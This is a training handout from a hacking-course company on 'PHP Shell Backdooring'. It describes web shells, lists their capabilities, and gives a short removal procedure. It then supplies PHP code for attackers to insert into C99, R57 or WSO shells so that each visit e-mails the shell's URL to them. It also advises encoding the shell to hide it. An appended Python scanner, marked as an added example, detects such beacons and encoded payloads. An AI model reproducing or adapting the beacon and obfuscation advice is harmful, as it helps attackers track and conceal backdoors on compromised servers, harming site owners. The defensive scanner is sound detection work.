SECUGENIUS SECURITY SOLUTIONS
(A UNIT OF HARKSH TECHNOLOGIES PVT. LTD)
Company Profile: Secugenius Security Solutions is a Student Entrepreneurial Company started by 2 Social Student Entrepreneurs in 2010 with an aim to make our country Cyber Crime Free. We at SECUGENIUS are headquartered at Ludhiana, the Manchester of Punjab. The main activities of Secugenius Security Solutions are providing training in Information Security and various professional courses. Secugenius Security Solutions is an organization which believes in inventing and implementing new ideas to influence the technological minds of youngsters.

Looking at the number of cyber crimes over the last many years, we at Secugenius Security Solutions provide training on Ethical Hacking & Cyber Security to students, IT professionals, bank employees and police officials. Secugenius conducts workshops in all parts of the country in various colleges and institutions for the benefit of the students, making them aware of the latest trends in the technological era of the computer age. We believe in spreading knowledge to all the youngsters and growing minds of the nation so that they can serve the nation with perfect skill-sets in the field of Cyber Crime Investigation & Forensic Sciences.

Secugenius provides various security solutions to its clients by securing their websites from cyber attacks. We provide training to college students, graduates and professionals in various fields. Education is delivered to students through two modes, i.e. Regular mode and Distance mode, which are available as short term and long term courses. In the workshops conducted by Secugenius, participants can claim to be trained by highly experienced and skilled corporate trainers from different parts of the nation. We believe in making the base of students as strong as possible. All the modules have been designed to provide students with specialized knowledge from specialized trainers.

This library was furnished, managed and funded by the Founders and Directors of Secugenius, Er. Harpreet Khattar & Er. Kshitij Adhlakha. The overall resource person for the content of the series of this Digital Library is Er. Chetan Soni - Sr. Security Specialist, Secugenius Security Solutions.

This Online Digital Library has been initiated as a free and permanent resource, on a specialization basis, for every student of Team Secugenius.
PHP Shell Backdooring
Product ID No: SG/ODL/13007
Founder & Director: Harpreet Khattar & Kshitij Adhlakha
Resource Person: Chetan Soni
Secugenius Security Solutions, SCO-13A, Model Town Extn, Near Krishna Mandir, Ludhiana-141002, Punjab – India
www.secugenius.com, www.seculabs.in
WHAT IS A SHELL?

The shells discussed here are web shells. Web shells are programs that are installed on a web server by an attacker and are used to remotely access and reconfigure the server without the owner's consent. They are remote access Trojans, but are also referred to as backdoors, since they offer the attacker an alternative way of accessing the website.

Most likely, the hacker stole my associate's FTP password. Once the hacker had the password, it was just a matter of uploading the shell. Then the hacker could log in through the new web shell, and do just about anything they wanted to the web server.

Many of these web shells allow the operator to access them through a proxy, thus hiding the location of the operator. Also, the shell can be bound to specific ports, and the information can be encrypted and hashed.

This type of Trojan provides a remote malicious user with access to the victim machine. It is a PHP script. This type of backdoor can be installed on a web server by a remote malicious user by uploading it via FTP, using the administrator's log-in details which have already been stolen. It can also be installed by exploiting a range of web site vulnerabilities which make it possible to upload an arbitrary file to the directory which contains the site scripts. Once this has been done, a hidden page appears on the site. Opening this page makes it possible for the malicious user to launch the backdoor and make use of its malicious functionality.
The backdoor is able to conduct the following actions on the remote server:

- Provide full access to files on the hard disk.
- Calculate a range of hashes for strings.
- Launch the command interpreter and bind its standard input/output to a specific TCP port.
- Bind the standard input/output of the command interpreter to data from the IRC server.
- View a list of processes launched on the server.
- Execute arbitrary PHP code.
- Download/upload files from/to the server.
- Search the server's hard disk for files with specific content.
- Manage MySQL databases (view/create/edit databases/tables).
- Run shell commands.
- Scan FTP server accounts for weak passwords (e.g. where the account name and password coincide).
- Delete the copy of itself from the server hard disk on command.
- Create a user account without password.
- View active users in the system.
- Delete records of its own activity from Apache server logs.
- Exploit a range of Linux kernel and bash command interpreter vulnerabilities.
Removal instructions

If your computer does not have an up-to-date antivirus, or does not have an antivirus solution at all, follow the instructions below to delete the malicious program:

1. Delete the original backdoor file (the location will depend on how the program originally penetrated the victim machine).
2. Update your antivirus databases and perform a full scan of the computer (use any up-to-date antivirus).
Backdooring Code:

    // Build the full URL of the page being requested (scheme, host, path and query string).
    $url = (!empty($_SERVER['HTTPS'])) ? "https://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'] : "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
    // E-mail that URL to a fixed address every time the page is loaded.
    mail(' Your Email ID Here', 'Shell Location', 'Someone visited the page: '.$url, 'From: Shell Victim');

Put this code in your PHP shell, such as C99, R57, WSO, etc.
Example:

    $url = (!empty($_SERVER['HTTPS'])) ? "https://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'] : "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
    mail('[email protected]', 'Shell Location', 'Someone visited the page: '.$url, 'From: Victim No. 1');
Save it as WSO.php. You can also encrypt your PHP shell code so that nobody can change it. For encrypting, you can use PHP encoders: http://www.rightscripts.com/phpencode/index.php
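
Seen from the server owner's side, the snippet above leaves a recognisable trace: a mail() call fed with a URL built from $_SERVER fields. The following Python triage scan is an added example, not part of the original document; it flags PHP files with that pattern and files wrapped in an eval(base64_decode(...)) style encoder, which hides such a call from static inspection. The function names, labels and sample files are constructed for illustration, and the match is a heuristic whose hits need manual review.

```python
import os
import re

# Request fields that reveal where a script is hosted (the page's snippet uses two).
SERVER_FIELD = re.compile(
    r"\$_SERVER\s*\[\s*['\"](?:SERVER_NAME|HTTP_HOST|REQUEST_URI|SCRIPT_NAME|PHP_SELF)['\"]\s*\]")
ASSIGN = re.compile(r"(\$[A-Za-z_]\w*)\s*\.?=(?![=>])([^;]*);", re.S)
MAIL_CALL = re.compile(r"(?<![\w$>:])mail\s*\(([^;]*)\)\s*;", re.S)
ENCODED = re.compile(r"\beval\s*\(\s*(?:gzinflate|base64_decode)\s*\(", re.I)

def scan_php_source(source):
    """Return sorted finding labels for one PHP source string."""
    findings = set()
    # Variables assigned from the hosting URL, like $url in the page's snippet.
    tainted = {name for name, expr in ASSIGN.findall(source)
               if SERVER_FIELD.search(expr)}
    for args in MAIL_CALL.findall(source):
        used = set(re.findall(r"\$[A-Za-z_]\w*", args))
        if SERVER_FIELD.search(args) or used & tainted:
            findings.add("mail-beacon")
    # An encoded file hides any beacon from the check above: flag it for decoding.
    if ENCODED.search(source):
        findings.add("encoded-payload")
    return sorted(findings)

def scan_tree(root):
    """Map each flagged .php/.phtml file under root to its findings."""
    report = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".phtml")):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_php_source(fh.read())
                if hits:
                    report[path] = hits
    return report

# Constructed samples (not taken from any real shell kit).
BEACON = r"""<?php
$url = "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
mail('collector@example.invalid', 'Shell Location', 'Visited: '.$url, 'From: x');
"""
CONTACT_FORM = r"""<?php
mail($to, 'Contact form', $_POST['message'], $headers);
"""
ENCODED_FILE = r"""<?php eval(base64_decode('Y29uc3RydWN0ZWQ=')); """
```

Legitimate applications sometimes mail request URLs too (error reporters, for example), so treat a "mail-beacon" hit as a file to read, not a verdict.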